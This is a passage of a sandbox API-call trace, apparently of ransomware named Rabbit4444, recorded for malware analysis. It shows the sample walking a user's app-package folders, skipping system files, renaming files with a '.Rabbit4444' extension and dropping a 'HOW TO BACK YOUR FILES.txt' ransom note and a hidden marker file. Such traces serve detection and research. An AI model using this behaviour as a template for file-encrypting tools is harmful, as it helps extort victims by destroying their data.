lpString2="settings.dat.LOG1" | out: lpString1="settings.dat.LOG1") returned="settings.dat.LOG1" [0066.282] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Settings\\settings.dat.LOG1", dwFileAttributes=0x22) returned 1 [0066.282] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Settings\\settings.dat.LOG1", dwFileAttributes=0x6) returned 1 [0066.282] lstrlenW (lpString="settings.dat.LOG1") returned 17 [0066.282] lstrlenW (lpString="Rabbit4444") returned 10 [0066.282] lstrcmpiW (lpString1="s.dat.LOG1", lpString2="Rabbit4444") returned 1 [0066.282] lstrlenW (lpString=".dll") returned 4 [0066.282] lstrcmpiW (lpString1="LOG1", lpString2=".dll") returned 1 [0066.282] lstrlenW (lpString=".lnk") returned 4 [0066.282] lstrcmpiW (lpString1="LOG1", lpString2=".lnk") returned 1 [0066.282] lstrlenW (lpString=".ini") returned 4 [0066.282] lstrcmpiW (lpString1="LOG1", lpString2=".ini") returned 1 [0066.282] lstrlenW (lpString=".sys") returned 4 [0066.282] lstrcmpiW (lpString1="LOG1", lpString2=".sys") returned 1 [0066.282] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Settings\\settings.dat.LOG1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.parentalcontrols_cw5n1h2txyewy\\settings\\settings.dat.log1"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0066.283] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0066.283] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15759347431) returned 1 [0066.283] GetFileSizeEx (in: hFile=0x27c, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=8192) returned 1 [0066.283] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0066.283] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0066.283] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2300, lpName=0x0) returned 0x260 [0066.285] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2300) returned 0x70000 [0066.286] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0066.286] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0066.286] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0066.287] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0066.287] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0066.287] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0066.287] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0066.287] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0066.287] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15759769158) returned 1 [0066.287] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0066.287] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0066.287] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.287] CloseHandle (hObject=0x260) returned 1 [0066.287] CloseHandle (hObject=0x27c) returned 1 [0066.287] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Settings\\settings.dat.LOG1.Rabbit4444") returned 125 [0066.287] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Settings\\settings.dat.LOG1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.parentalcontrols_cw5n1h2txyewy\\settings\\settings.dat.log1"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Settings\\settings.dat.LOG1.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.parentalcontrols_cw5n1h2txyewy\\settings\\settings.dat.log1.rabbit4444"), dwFlags=0x1) returned 1 [0066.288] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xd9108aa5, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd9108aa5, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xd9108aa5, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 1 [0066.288] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.288] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.288] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="Rabbit4444.exe") returned 1 [0066.288] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2=".") returned 1 [0066.288] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="..") returned 1 [0066.288] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="windows") returned -1 [0066.288] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="bootmgr") returned 1 [0066.288] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="pagefile.sys") returned 1 [0066.288] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="boot") returned 1 [0066.288] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="ids.txt") returned 1 [0066.288] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="NTUSER.DAT") returned 1 [0066.288] lstrcpyW (in: lpString1=0x130ebfa, lpString2="settings.dat.LOG2" | out: lpString1="settings.dat.LOG2") returned="settings.dat.LOG2" [0066.288] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Settings\\settings.dat.LOG2", dwFileAttributes=0x22) returned 1 [0066.289] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Settings\\settings.dat.LOG2", dwFileAttributes=0x6) returned 1 [0066.289] lstrlenW (lpString="settings.dat.LOG2") returned 17 [0066.289] lstrlenW (lpString="Rabbit4444") returned 10 [0066.289] lstrcmpiW (lpString1="s.dat.LOG2", lpString2="Rabbit4444") returned 1 [0066.289] lstrlenW (lpString=".dll") returned 4 [0066.289] lstrcmpiW (lpString1="LOG2", lpString2=".dll") returned 1 [0066.289] lstrlenW (lpString=".lnk") returned 4 [0066.289] lstrcmpiW (lpString1="LOG2", lpString2=".lnk") returned 1 [0066.289] lstrlenW (lpString=".ini") returned 4 [0066.289] lstrcmpiW (lpString1="LOG2", lpString2=".ini") returned 1 [0066.289] lstrlenW (lpString=".sys") returned 4 [0066.289] lstrcmpiW (lpString1="LOG2", lpString2=".sys") returned 1 [0066.289] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xd9108aa5, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd9108aa5, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xd9108aa5, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 0 [0066.289] FindClose (in: hFindFile=0x1026d0 | out: hFindFile=0x1026d0) returned 1 [0066.289] lstrcpyW (in: lpString1=0x130ebfa, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.289] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Settings\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.parentalcontrols_cw5n1h2txyewy\\settings\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.290] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.290] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.291] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.291] CloseHandle (hObject=0x27c) returned 1 [0066.291] CloseHandle (hObject=0x228) returned 1 [0066.291] GetCurrentThreadId () returned 0xd98 [0066.291] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122068 [0066.291] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\RoamingState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\RoamingState" [0066.291] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108688 | out: hHeap=0xe0000) returned 1 [0066.292] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122060 | out: hHeap=0xe0000) returned 1 [0066.292] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\RoamingState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\RoamingState" [0066.292] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\RoamingState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\RoamingState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\RoamingState\\" [0066.292] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\RoamingState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3" [0066.292] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.parentalcontrols_cw5n1h2txyewy\\roamingstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.294] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.296] FlushFileBuffers (hFile=0x228) returned 1 [0066.297] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.297] CloseHandle (hObject=0x228) returned 1 [0066.298] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\RoamingState") returned 100 [0066.298] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.298] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\RoamingState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x82539239, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd0d95a84, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf0d7259d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a10 [0066.298] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.298] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.298] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.298] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.298] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x82539239, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd0d95a84, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf0d7259d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.298] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.298] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.298] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.298] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.298] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.298] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0d7259d, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0d7259d, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0d7259d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.299] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.299] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.299] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0d7259d, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0d7259d, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0d7259d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0066.299] FindClose (in: hFindFile=0x102a10 | out: hFindFile=0x102a10) returned 1 [0066.299] lstrcpyW (in: lpString1=0x130ec02, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.299] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\RoamingState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.parentalcontrols_cw5n1h2txyewy\\roamingstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.299] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.299] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.300] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.300] CloseHandle (hObject=0x27c) returned 1 [0066.300] CloseHandle (hObject=0x228) returned 1 [0066.300] GetCurrentThreadId () returned 0xd98 [0066.300] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122188 [0066.300] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\LocalState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\LocalState" [0066.300] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x116860 | out: hHeap=0xe0000) returned 1 [0066.300] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122180 | out: hHeap=0xe0000) returned 1 [0066.300] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\LocalState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\LocalState" [0066.300] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\LocalState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\LocalState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\LocalState\\" [0066.300] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\LocalState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3" [0066.300] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.parentalcontrols_cw5n1h2txyewy\\localstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.301] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.304] FlushFileBuffers (hFile=0x228) returned 1 [0066.305] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.305] CloseHandle (hObject=0x228) returned 1 [0066.306] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\LocalState") returned 98 [0066.306] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.306] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\LocalState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x82539239, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd0d9538e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf0d7259d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102890 [0066.306] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.306] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.306] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.306] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.306] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x82539239, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd0d9538e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf0d7259d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.306] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.306] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.306] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.306] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.306] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.306] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0d7259d, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0d7259d, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0d7259d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.307] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.307] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.307] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0d7259d, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0d7259d, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0d7259d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0066.307] FindClose (in: hFindFile=0x102890 | out: hFindFile=0x102890) returned 1 [0066.307] lstrcpyW (in: lpString1=0x130ebfe, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.307] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\LocalState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.parentalcontrols_cw5n1h2txyewy\\localstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.308] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.308] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.308] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.308] CloseHandle (hObject=0x27c) returned 1 [0066.308] CloseHandle (hObject=0x228) returned 1 [0066.308] GetCurrentThreadId () returned 0xd98 [0066.308] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122308 [0066.308] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\LocalCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\LocalCache" [0066.308] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x116ad0 | out: hHeap=0xe0000) returned 1 [0066.308] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122300 | out: hHeap=0xe0000) returned 1 [0066.308] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\LocalCache" | out: 